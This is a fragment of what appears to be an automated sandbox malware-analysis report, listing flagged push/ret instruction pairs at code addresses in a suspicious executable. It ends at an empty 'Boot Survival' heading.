          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00424540 push 0042456Ch; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0042E57C push 0042E5A8h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0042E5CC push 0042E60Fh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00436580 push 004365ACh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00428608 push 00428661h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0042E634 push 0042E677h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004306C8 push 0043070Ah; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004246D8 push 00424704h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0042E6F0 push 0042E73Bh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0042E698 push 0042E6E4h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0042E748 push 0042E774h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00410736 push 004107AEh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00410738 push 004107AEh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004107B0 push 00410858h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0041085A push 00410970h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0041A8AE push 0041A95Bh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0041A8B0 push 0041A95Bh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00410944 push 00410970h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0041A960 push 0041A9F0h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_004069D4 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_0041A9F2 push 0041AD10h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00462A60 push 00462A8Ch; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00460AE4 push 00460B24h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe  Code function: 0_2_00412ABC push ecx; mov dword ptr [esp], edx

          Boot Survival:
